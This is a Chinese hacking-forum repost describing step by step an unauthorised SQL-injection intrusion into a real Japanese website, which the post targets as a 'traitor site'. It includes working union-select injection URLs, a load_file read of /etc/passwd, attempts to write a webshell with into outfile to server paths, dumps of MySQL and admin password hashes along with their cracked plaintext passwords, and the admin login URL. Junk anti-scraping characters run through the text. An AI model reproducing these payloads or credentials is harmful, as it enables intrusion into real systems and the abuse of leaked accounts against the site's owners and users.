原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

, Y& m$ K$ v) B0 x; F4 p1 d4 u/ Y6 H
4 j/ g! l5 R4 l) @% c0x01. 检测 www.zuaa.jp 收集数据
0 o- J, d8 U) o5 j: G

. _; s+ @0 [- ?, W5 u! n8 I4 y/ O7 c. Qwhatweb
6 ~) o$ }+ W7 M

' R. d! R, F  U/ k1 \; b- e. \利用NMAP扫描
$ ^7 ~; Z# x% H: a! J0 R4 [
6 U- Y& T$ m8 {/ V  Y' |0 C中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
' i' H( Z4 U4 S  Z" I0x02.找注入点
找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390


* o/ {# g  A% r8 s0x03.order by
2 ]! L/ q2 {% }( O9 p             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
: p6 a, R: Z& P
order by 28报错，order by 27正常
+ d  j! L$ G6 e9 N, W
0x04.   union手动查询
- o; z6 |. ?6 ^http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
0 [3 K& M+ z" a5 E' o! V添加到 27 时正常显示

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

$ `( U- o- R% |0x05. info:
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 Q1 ]3 ^: x& g# L
user:            root@localhost
database:    openpne
* i7 h6 l  B2 _/ ^+ V* i6 R" Bversion:      4.1.22
' p8 A+ A7 f; o, Q! K# b5 Oos:             portbld-freebsd5.4
! T0 W# p) X% H! _2 ^3 S
) X& U: R+ x4 D6 J! m0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
6 Z* l7 Y3 ?; b2 v' z; X
通过工具转换

$ T' y# x) Z! N: k中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
5 }" L5 Y8 D8 J! u- v- N+ R: X
0x07. 利用 into outfile
全部都失败
; G  X. o: ]' C4 i( Z) nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

页面显示“MDB2 Error:syntax error”

, ?2 h% ]! \8 d' G0x08. 利用 mysql 4.1
猜常规表名，字段未果 工具 sqlmap
% L0 K+ N  d+ B. f( q0 `中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
8 y4 S, S" o0 L

+ ^/ y: t. ^, t5 F; j, h
0x09. 查找后台
! u6 D. V1 {/ a/ O+ p% o8 v/ i* D/ X利用 现有的各种 后台工具尝试都不行
1 H; T) B( a: X
1 ~3 y/ z, D$ L/ F1 d! U0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
/ F3 A  l9 h" {2 M# k可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user

- A- L* X9 Z5 ~( z) B* o0 A这个可以在 www.cmd5.com 解密
" Q% b! ?5 x8 c" `! d* qroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
  ~) L0 @* y9 N, k/ h: Ochen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
  a" g2 ?; I* W+ i$ ~# Oopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
. }; j- Q8 k6 m工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知

& h" L2 w& h& R- O/ t6 F5 K; l; c4 g
0x11. 网站突破
发现网站的源程序 openpne, google 下载 openpne 源码
( C' ?' p* X9 N/ x3 m

0x12. 默认信息利用
$ z) f+ ^  a) J8 G# [http://sns.zuaa.jp/?m=admin&a=page_login

/ o& I! P1 G' {3 T表名 (c_admin_user) ，字段名（username,password）
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
4 U  @. U: L# Q+ T* l" _
解密
2 c) \# y, M  X% H; `/ |  vzuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
2 `4 X# r9 L* W  G% j: ^2 U
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

) k9 v: B: U, B& g% T; e! e; v% ^+ e0x13. 登录后台

2 x7 t0 y( X/ d5 F' v2 Z- A, t
0 P4 W8 ?; i( x. ?0 h8 ?. }7 N
0x14. 小结
利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
+ ]' Z$ F# `' b' |感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
1 I2 {) T3 a6 ]. v4 K: ?中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！
6 j3 W/ F- K3 Y5 ]# c

荒村狂客

哪个牛人 费的这劲 入侵的